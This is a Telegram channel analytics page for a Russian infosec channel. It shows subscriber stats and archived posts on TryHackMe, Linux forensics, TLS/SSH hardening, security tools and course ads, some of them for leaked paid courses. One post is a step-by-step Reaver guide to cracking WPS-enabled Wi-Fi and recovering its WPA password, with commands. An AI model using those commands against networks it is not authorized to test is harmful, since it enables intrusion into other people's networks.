fa
Feedback
CodeGuard: PySec Edition

CodeGuard: PySec Edition

کانال بسته

Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy

نمایش بیشتر

📈 تحلیل کانال تلگرام CodeGuard: PySec Edition

کانال CodeGuard: PySec Edition بازیگری فعال است. در حال حاضر جامعه شامل 14 097 مشترک است و جایگاه 8 760 را در دسته فناوری و برنامه‌ها و رتبه 45 869 را در منطقه روسيا دارد.

📊 شاخص‌های مخاطب و پویایی

از زمان ایجاد در невідомо، پروژه رشد سریعی داشته و 14 097 مشترک جذب کرده است.

بر اساس آخرین داده‌ها در تاریخ 26 سپتامبر, 2026، کانال فعالیت پایداری دارد. در ۳۰ روز گذشته تغییر اعضا برابر 821 و در ۲۴ ساعت گذشته برابر 0 بوده و همچنان دسترسی گسترده‌ای حفظ شده است.

  • وضعیت تأیید: تأیید نشده
  • نرخ تعامل (ER): میانگین تعامل مخاطب 9.98% است و در ۲۴ ساعت نخست پس از انتشار، محتوا معمولاً 5.58% واکنش نسبت به کل مشترکان کسب می‌کند.
  • دسترسی پست‌ها: هر پست به طور میانگین 1 407 بازدید دریافت می‌کند. در اولین روز معمولاً 786 بازدید جمع‌آوری می‌شود.
  • واکنش‌ها و تعامل: مخاطبان به‌طور فعال حمایت می‌کنند؛ میانگین واکنش به هر پست 8 است.
  • علایق موضوعی: محتوا بر موضوعات کلیدی مانند codeguard, pysec, docker, grep, контейнер تمرکز دارد.

📝 توضیح و سیاست محتوایی

نویسنده این فضا را محل بیان دیدگاه‌های شخصی توصیف می‌کند:
“Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”

به لطف به‌روزرسانی‌های پرتکرار (آخرین داده در تاریخ 27 سپتامبر, 2026)، کانال همواره به‌روز و دارای دسترسی بالاست. تحلیل‌ها نشان می‌دهد مخاطبان به‌طور فعال با محتوا تعامل دارند و آن را به نقطه اثرگذاری مهم در دسته فناوری و برنامه‌ها تبدیل کرده‌اند.

14 097
مشترکین
اطلاعاتی وجود ندارد24 ساعت
+2477 روز
+82130 روز
آرشیو پست ها
😍 TryHackMe-Roadmap: 350+ бесплатных комнат по ИБ в одном репозитории «~» Шедевро-репозиторий представляет собой живую подбо
😍 TryHackMe-Roadmap: 350+ бесплатных комнат по ИБ в одном репозитории
«~» Шедевро-репозиторий представляет собой живую подборку из нескольких сотен бесплатных комнат TryHackMe, разложенных по удобным разделам с разными уровнями и темами
📌 Какие разделы есть внутри:
🎥 Fundamentals: вводные комнаты, Linux/Windows‑база, принципы безопасности, первые пентест‑сценарии 🎥 Тематические ветки: Recon, Scripting, Web, Forensics, Malware Analysis, PrivEsc, Active Directory, PCAP, Buffer Overflow 🎥 CTF‑блоки: CTF всех уровней + спец‑ивенты вроде Advent of Cyber, чтобы качать навык решения задач под разным уровнем боли в пятой точке
🤩 Репозиторий удобно использовать как чек‑лист для обучения кибербезу — отметили, что уже прошли, выбрали следующую тему, закрепили практикой на TryHackMe без бесконечного скролла каталога комнат. Все просто 😏 😈 CodeGuard: PySec Edition | Чат

⚡️⚠️📊Сделал подборку рекомендую вам ознакомьтесь 🤙 • Арсенал Безопасника — Лучшие инструменты для хакинга и OSINT • Хакер | Red Team — Библиотека Хакера тут вы найдете только эксклюзив! Автор делится лучшим. (новинка) • Max Open Source — Полезные статьи и бесплатные курсы по этическому хакингу, пентесту, программированию и информационным технологиям. • IT MEGA — Тут эксклюзивные материалы, курсы по программированию, информационная безопасность хакингу, Osint и IT. • Книги | Books — Одна из крупных библиотек в сегменте Telegram. Тысячи книг и полезного материала. • Библиотека Cobalt Strike — Все для знакомства с хакингом, пентестом, эксклюзивной информация, курсы, книги, статьи и инструменты. • Журнал Хакер — Журнал хакер, канал архив, все выпуски с 1999- до последнего! Удивительный мир! • Библиотека разведчика Osint — Единственная в своем роде библиотека по теме OSINT, разведки в сети, сбору информации, технологии конкурентной разведки, поиск о цели. ‼️ В общей сложности, данные проекты насчитывают терабайты курсов и книг. Присоединяйся 📲💻

🧬 Linux-форензика: с чего нужно начать разбор системы? — Собрал для вас мини‑подборку по Linux‑форензике со шпаргалками кома
🧬 Linux-форензика: с чего нужно начать разбор системы? — Собрал для вас мини‑подборку по Linux‑форензике со шпаргалками команд, тулкитами и утилитами для живого анализа и последующего разбора образов 💬 Шпаргалки и методички:
1️⃣ Linux Command Line Forensics and Intrusion Detection — Набор базовых команд для быстрого осмотра живой Linux‑системы: процессы, сетевые соединения, пользователи, cron, бинарники, логи 2️⃣ Linux Forensics Cheatsheet — Краткие сводки по основным артефактам: auth‑логи, системные журналы, history, bashrc, SSH‑ключи, cron, временные файлы 3️⃣ Linux Forensic Artifact Cheatsheet — Шпаргалка с фокусом на артефакты и инструменты: LiME и AVML для дампа памяти, Volatility и Rekall для анализа, Sleuth Kit и Autopsy для дисков, Plaso и log2timeline для таймлайнов
👁️ Инструменты и дистрибутивы:
4️⃣ LiME и AVML — LiME и AVML позволяют аккуратно снять дамп RAM с Linux‑системы, чтобы потом разбирать его 5️⃣ Volatility и Rekall — Фреймворки для работы с дампами: процессы, модули ядра, скрытые процессы, сетевые сессии, артефакты малвари 6️⃣ The Sleuth Kit — Набор утилит и GUI‑оболочка для анализа образов дисков: файловые системы, удалённые файлы, метаданные, временные метки, артефакты браузера и пользователя 7️⃣ Plaso — Инструмент, который собирает события из логов, файловой системы и артефактов в единый временной ряд
🤡 Живой IR и автоматизация
8️⃣ Linux live forensics — Практические разборы инцидентов на живых Linux‑серверах: какие данные собирать в первые минуты, чем это грозит для целостности артефактов и как автоматизировать сбор 9️⃣ LINReS — Open source‑скрипт под live‑IR: собирает volatile и non‑volatile данные с подозрительного хоста и отправляет их на форензик‑станцию по заранее поднятым каналам
Набираем 15 реакций и я дропаю минимальный чек‑лист по теме «Что сделать в первые 10–15 минут на скомпрометированном Linux‑хосте» с конкретными командами 🔑 😈 CodeGuard: PySec Edition | Чат

🧠 С ЭТИМ САЙТОМ ТЫ СОВЕРШЕННО БЕСПЛАТНО ПРОЙДЕШЬ ВСЮ БАЗУ ПО ИИ И РАБОТЕ С ДАННЫМИ 🫶 Что это за чудо такое? 🎥 Cognitive Cl
🧠 С ЭТИМ САЙТОМ ТЫ СОВЕРШЕННО БЕСПЛАТНО ПРОЙДЕШЬ ВСЮ БАЗУ ПО ИИ И РАБОТЕ С ДАННЫМИ 🫶 Что это за чудо такое? 🎥 Cognitive Class — образовательная платформа от IBM с сотней бесплатных курсов и проектов по искусственному интеллекту, data science и облачным технологиям и смежным темам 📚 Темы, которые закрывает платформа:
— Базовый и продвинутый data science: Python, анализ данных, визуализация, машинное обучение, работа с реальными датасетами — ИИ и ML: вводные по AI, классические алгоритмы, нейросети, NLP, компьютерное зрение — Облака и big data: основы cloud‑вычислений, работа с Hadoop и Spark, построение решений в облаке
📎 Отдельный плюс: За прохождение многих треков можно получить сертификаты и бейджи, которые удобно прикладывать к резюме и профилю 😈 CodeGuard: PySec Edition | Чат

☄️В преддверии Нового года айтишник из “Matrix” скупил все курсы топовых IT-школ и выложил 5 ТБ слитых курсов к себе в каналы
☄️В преддверии Нового года айтишник из “Matrix” скупил все курсы топовых IT-школ и выложил 5 ТБ слитых курсов к себе в каналы! 👩‍💻 Python: https://t.me/+kBPlIQ1kpHw0YmQy 👩‍💻 Все ЯП: https://t.me/+pkvOZc3g5gU3YTEy 👩‍💻 Backend: https://t.me/+QRq_LSpodJ80NjE6 📱 Frontend и Web: https://t.me/+jOItOzJamrNhOTIy 👩‍💻 Графика и дизайн: https://t.me/+lxe3X0QQXVk2NWIy Все материалы в закрепе и постоянно пополняются👆

🔐 АТАКУЕМ WI-FI C WPS ПРИ ИСПОЛЬЗОВАНИИ REAVER — Практический гайд «~» WPS — это удобная настройка Wi‑Fi по кнопке или пину,
🔐 АТАКУЕМ WI-FI C WPS ПРИ ИСПОЛЬЗОВАНИИ REAVER — Практический гайд
«~» WPS — это удобная настройка Wi‑Fi по кнопке или пину, которая сильно упрощает жизнь пользователю, но делает сеть уязвимой для перебора. В статье по ссылке говорится как правильно провести этот самый перебор. Делюсь своим опытом, как я организовывал подобную атаку по данному материалу
🤩 Шаг 1. Готовим карту и систему: Нам понадобится карта с режимом монитора и инъекциями (Atheros часто ведёт себя лучше всего с Reaver) — Отключаем всё лишнее:
sudo systemctl stop NetworkManager
sudo airmon-ng check kill
— Смотрим интерфейс:
sudo iw dev
— Переводим wlan0 в монитор‑режим:
sudo ip link set wlan0 down
sudo iw wlan0 set monitor control
sudo ip link set wlan0 up
🔍 Шаг 2. Ищем точки с включённым WPS: Для разведки возьмем wash (идёт в комплекте с Reaver)
sudo wash -i wlan0
— Ждем пару минут и смотрим колонки: 🎥 BSSID – MAC точки 🎥 Ch – канал 🎥 WPS – версия WPS 🎥 Lck – блокировка WPS (No — интересует, Yes — можно пройти мимо) 🎥 ESSID – имя сети (Для атаки подойдут только те, у кого Lck = No) 💀 Шаг 3. Проверим Pixie Dust через Reaver: Если точка уязвима к Pixie Dust, PIN можно вытащить почти сразу, без долгого онлайнового перебора — Берем BSSID из вывода wash, например:
EE:43:F6:CF:C3:08
— Запускаем проверку:
sudo reaver -i wlan0 -b EE:43:F6:CF:C3:08 -K
— Если роутер уязвим, Reaver покажет PIN вида:
WPS pin: 36158805
(На этом этапе у нас есть PIN, но все ещё нет WPA‑пароля) 👾 Шаг 4. Полный перебор WPS PIN, если Pixie не зашёл: Если Pixie Dust не сработал и PIN’ы не подошли, остаётся классический перебор:
sudo reaver -i wlan0 -b EE:43:F6:CF:C3:08 -vv
— Ключи -v/-vv/-vvv увеличивают подробность вывода и помогают понять, на чём всё ломается >> За счёт уязвимости протокола WPS реальное пространство перебора — всего около 11 000 комбинаций, а не десятки миллионов, поэтому это задача на пару часов для опытных спецов 🤲 Шаг 5. Если у нас уже есть PIN, то достаем WPA‑пароль: Если PIN уже известен, можно попросить Reaver вытащить WPA‑пароль напрямую:
sudo reaver -i wlan0 -b EE:43:F6:CF:C3:08 -p 36158805 -vv
— В успешном сценарии на выходе получаю строку с PSK: это и есть пароль от Wi‑Fi 🛡 Как наоборот защититься от атак? >> С точки зрения защиты единственный надёжный шаг, это отключить WPS с PIN в настройках роутера. Если производитель позволяет, плюсом включить блокировку WPS 😈 CodeGuard: PySec Edition | Чат

👾 «Реагирование на инциденты и управление рисками безопасности»: Практический курс про то, как работать с реальными инцидент
👾 «Реагирование на инциденты и управление рисками безопасности»: Практический курс про то, как работать с реальными инцидентами — Разработан под тех, кто хочет уметь не только ловить алерты, но и разруливать последствия для бизнеса, даже когда ресурсов и людей минимум 🌐 Что разберёте на курсе:
— Как выстраивать процесс реагирования от обнаружения атаки и разбора логов до ликвидации и пост‑анализа — Как работать с киберрисками: выявлять активы и уязвимости, оценивать влияние инцидента на бизнес, выбирать, какие риски можно реально снижать, а какие наоборот осознанно принимать — Как использовать open source‑инструменты и простые практики, когда SIEM за миллионы не завезли, а инциденты уже есть
💡 Также приятно то, что упор сделан на реальные кейсы и разбор типовых факапов: ошибки в коммуникации, неправильную приоритизацию, отсутствие плана IRP и документации — все то, что в жизни ломается куда чаще, чем сами технологии. ➡️ Забрать курс 😈 CodeGuard: PySec Edition | Чат

Держите 6 хороших каналов по искусственному интеллекту и нейросетям для любого уровня. Можешь выбрать сам: 🤖 AI — @ai_prompt
Держите 6 хороших каналов по искусственному интеллекту и нейросетям для любого уровня. Можешь выбрать сам: 🤖 AI — @ai_prompt 📱 Нейросети — @neuro_prompt 📱 Python — @python_prompt 🤔 InfoSec — @infosec_prompt 👩‍💻 IT Новости — @it_news 😄 IT Мемы — @it_memes Обучение, правильные промпты, разборы и полезные ресурсы на каждую тему!

Делаем новинку?
Anonymous voting

Готовлю новый канал CodeGuard: Academy Сижу над ним потно, чтобы там было прям годнота для своих. Поддержи подпиской: тебе се
+1
Готовлю новый канал CodeGuard: Academy Сижу над ним потно, чтобы там было прям годнота для своих. Поддержи подпиской: тебе секунда, а мне мотивация пилить контент. 👉 https://t.me/+XI5KQ-XdAow3YWMy 😈 CodeGuard: PySec Edition | Чат

🧠 «Социальная инженерия и этичный хакинг на практике» Джо Грея — это практический мануал по тому, как этично закрывать дырки
🧠 «Социальная инженерия и этичный хакинг на практике» Джо Грея — это практический мануал по тому, как этично закрывать дырки в процессах безопасности
Книга показывает, почему даже идеально настроенный периметр бессилен, если сотрудники сами выдают доступы, кликают по ссылкам и доверяют админам по телефону
🌟 Что внутри книги? — Психология атак: какие триггеры используют социнженеры и как из них собираются сценарии фишинга — Практический OSINT и подготовка атак, как по открытым источникам собрать досье на компанию и людей — Этичный пентест людей: структуры фишинговых кампаний + рекомендации, как результаты таких тестов превращать в обучение 💡 Чем так хороша эта книга? >> Она является хорошим мостом между технарями и человеческим периметром. После прочтения книги проще объяснить бизнесу, почему защиты от людей нужны не меньше, чем новый firewall 📕 Ссылка на книгу как всегда в нашем архиве — [ARCHIVE] 😈 CodeGuard: PySec Edition | Чат

⚠️ Git: мини-шпаргалка по жизненному циклу изменений 1️⃣ Working Directory: Здесь правите файлы, запускаете тесты и ломаете в
⚠️ Git: мини-шпаргалка по жизненному циклу изменений 1️⃣ Working Directory: Здесь правите файлы, запускаете тесты и ломаете всё, что можно —git add: нужен, чтобы перенести выбранные изменения в подготовительную область 2️⃣ Staging: Снимок того, что пойдёт в следующий коммит —git commit: зафиксировать содержимое staging в локальном репозитории 3️⃣ Local Repository: История всех ваших коммитов на машине —git push: отправить локальные коммиты на сервер —git fetch: забрать новые коммиты с сервера без слияния —git pull – fetch + авто‑слияние в текущую ветку 5️⃣ Stash: Когда нужно убрать со стола, но ещё рано коммитить — git stash: спрятать незакоммиченные изменения — git stash apply: вернуть изменения, не очищая stash — git stash pop: вернуть и одновременно удалить запись из stash 5️⃣ Remote Repository — Общий репо проекта на GitHub / GitLab / Bitbucket, куда пушит вся команда 😈 CodeGuard: PySec Edition | Чат

🥷 Стажировки и вакансии по ИБ и OSINT - Вакансии которых нет на джоб-агрегаторах - Только прямые контакты HR в Telegram 👉 @
🥷 Стажировки и вакансии по ИБ и OSINT - Вакансии которых нет на джоб-агрегаторах - Только прямые контакты HR в Telegram 👉 @jobs_ib Пока другие листают джоб-сайты — ты уже пишешь HR в Telegram.

🔐 Практика: как руками проверить и подкрутить безопасные протоколы связи «~» Теорию про знает каждый второй, а вот тех, кто
🔐 Практика: как руками проверить и подкрутить безопасные протоколы связи
«~» Теорию про знает каждый второй, а вот тех, кто реально открывал конфиг и бил по нему в разы меньше. Подготовил для вас практический чек-лист, который подойдет к любому серверу
1️⃣ Проверяем TLS: что торчит наружу — Быстрый скан протоколов и шифров:
nmap --script ssl-enum-ciphers -p 443 example.com
В выводе смотрим: 🎥 Отключены ли SSLv2/3 и старые TLS 1.0/1.1 🎥 Нет ли древних шифров вроде 3DES/RC4 🎥 Используется ли современный TLS 1.2/1.3 с AES‑GCM или CHACHA20 2️⃣ Смотрим сертификат через openssl
echo QUIT | openssl s_client -connect example.com:443 2>/dev/null \
  | openssl x509 -noout -issuer -dates -subject
— Проверяем кто выдал сертификат, не истёк ли он и корректен ли subject/сан‑имена. Полезно для быстрой диагностики и проверки сторонних сервисов без GUI 3️⃣ Жёстко настраиваем SSH, акцентируем внимание на ключи и современные шифры — Резервная копия и правка конфига:
sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak
sudo nano /etc/ssh/sshd_config
Базовый набор, который стоит включить почти везде:
Protocol 2
PasswordAuthentication no
PermitRootLogin no
ClientAliveInterval 300
ClientAliveCountMax 2
После изменений:
sudo systemctl restart sshd
— Так вы режете логин по паролю, прямой root и вешаете таймаут на вечные зависшие сессии После такого цикла безопасность протоколов начинает ощущаться как осязаемый набор рычагов, за которые можно дёргать самому, пользуемся 😎 😈 CodeGuard: PySec Edition | Чат

🤩 Подборка лучших GitHub-репозиториев для ИБ-специалистов
1) Raccoon — Высокопроизводительный сканер для рекогносцировки: с DNS, портами, веб‑фингерпринтингом, всё в одном CLI 2) BlueTeam-Tools — Собрание инструментов для blue team: мониторинг, лог‑анализ, форензика, DLP, сетевые сенсоры и т.п. 3) Awesome Annual Security Reports — Годовые отчёты по угрозам, инцидентам и трендам от разных компаний 4) OSSEC — Хостовый IDS с мониторингом логов, файловой системой, rootkit‑чекером, алертамм по правилам 5) SafeLine — Высокопроизводительный прокси с встроенным WAF: защита HTTP‑трафика, правила, дашборд, удобный деплой в Docker/K8s. 6) ZAP — Прокси‑сканер приложений: пассивный и активный поиск уязвимостей, фуззинг, API для автоматизации 7) Radare2 и Cutter — Radare 2 это CLI‑фреймворк для анализа бинарей и памяти. Вместе с GUI‑фронтендом Cutter покрывает большую часть задач реверса и отладки 8) Cuckoo Sandbox — Песочница для автоматического запуска подозрительных образцов, имеет настройку поведения, сетевого трафика, артефактов в системе 9) AutoRecon — Фреймворк, который запускает цепочку проверок и раскладывает результаты по папкам 10) pcileech — Инструменты для работы через PCIe/DMA (dump/patch RAM, обход аутентификации и т.п.)
😈 CodeGuard: PySec Edition | Чат

Айтишников в 2025 году больше, чем цыган. И каждый, естественно, хочет быть видным сеньором, свою геймдев-студию, 15.000€ зэпэшечку и больше никогда не выходить на рабочие созвоны. И как быть новичку сегодня? Или айтишнику, решившему сменить сферу деятельности. Бери менторство по ИБ. Кибербезопасность сейчас на подъеме, поэтому даже для ITшника это будет сильное конкурентное преимущество и спидран на буст навыков с нуля. ➦ От корки до корки узнаешь индустрию. Кто много платит и ищет специалистов, какие есть направления. ➦ Получишь все хард и софт скиллы для работы в нише. ➦ Заимеешь переговорные навыки и научишься писать идеальные резюме. Даже если ты уже работаешь в киберсеке, но чувствуешь, что нуждаешься в левел-апе — ю а вэлком. А еще у нас для тебя есть разовые консультации и помощь в составлении резюме. Почитай подробности: https://t.me/+_F4FzzaOTQk2N2Qy

🤨 Burp Suite за 1 час: из хаоса вкладок в рабочий инструмент «•» После просмотра этого видео Burp перестанет выглядеть как с
🤨 Burp Suite за 1 час: из хаоса вкладок в рабочий инструмент
«•» После просмотра этого видео Burp перестанет выглядеть как страшная панель с сотней кнопок и превратится в понятный рабочий инструмент
 🗒 В уроке автор спокойно проходит весь путь работы с ним: — Разбор настройки прокси — Перехват и правка HTTP‑запросов — Наглядная работа с Repeater и Intruder — Обучение поиску уязвимостей на тестовом приложении ➕ Отдельный плюс — автор делает упор на реальные приёмы: где смотреть параметры, как быстро гонять payload’ы и на что обращать внимание при тестировании веб‑приложений 📎 Смотрим и закрепляем свои знания *здесь* 😈 CodeGuard: PySec Edition | Чат

⚠️ Taranis AI — инструмент, превращающий OSINT‑поток в осмысленную ленту, а не в свалку ссылок —> Веб-движок умеет сам ходить
⚠️ Taranis AI — инструмент, превращающий OSINT‑поток в осмысленную ленту, а не в свалку ссылок
—> Веб-движок умеет сам ходить по сайтам и другим открытым источникам, собирать новости и статьи, прогонять их через NLP и вытаскивать из текста сущности и ключевые факты
🔇 Что делает Taranis AI: 1) Агрегирует сырые OSINT‑события в единую ленту 2) Нормализует и обогащает контент через NER, дедупликацию, выделение важных сигналов 3) Поддерживает совместную работу команд и обмен историями через MISP 🔑 Taranis AI отлично подходит как ядро OSINT‑процесса для blue‑team: он берёт на себя рутину сбора и первичной обработки, а аналитик тратит время только на интерпретацию и принятие решений 😈 CodeGuard: PySec Edition | Чат

Изоляция рунета ближе, чем ты думаешь Loading … ██████████████] 99% Роскомнадзору дали карт-бланш на блокировки, а «белые спи
Изоляция рунета ближе, чем ты думаешь
Loading … ██████████████] 99%
Роскомнадзору дали карт-бланш на блокировки, а «белые списки» сайтов тестируют уже в десятках регионов. И гайки будут закручиваться только сильнее. Чтобы в одночасье не лишиться доступа к свободному Интернету, просто сохрани Only Hack. Тут профессиональный хакер делится фишками, с которыми доступ к глобальной сети у тебя будет даже в случае ядерного апокалипсиса. Не жди момента «Х». Перестрахуйся подпиской.

💻 Smap — тихий сканер портов на базе Shodan «~» Обычно Nmap сам ломится к целям в дверь, smap же делает все аккуратнее. Он б
💻 Smap — тихий сканер портов на базе Shodan
«~» Обычно Nmap сам ломится к целям в дверь, smap же делает все аккуратнее. Он берёт уже готовые данные у Shodan и собирает по ним картину открытых портов и сервисов, без всяких SYN‑флудов
🔑 ЧТО ОН УМЕЕТ? 1. Drop‑in замена Nmap — Принимает те же ключи -p, -o*, -iL, -h и выдаёт выход в привычных форматах (-oX, -oG, -oN, -oA) 2. До 200 хостов/сек без сканирования сети — По факту мы лишь дергаем бесплатный Shodan API, а Smap отвечает скоростью и не светит ваш IP 3. Версии сервисов и уязвимости — Smap подтягивает баннеры, версии и связанные CVE/теги. В формате -oS можно увидеть уязвимости и метки Shodan 🥸 Помимо nmap‑форматов у него есть и свои:
-oP — список IP:PORT построчно для пайплайнов и других тулов -oJ — JSON -oS — фирменный Smap‑формат с тегами и уязвимостями
⭐️ Ставим Smap себе здесь 😈 CodeGuard: PySec Edition | Чат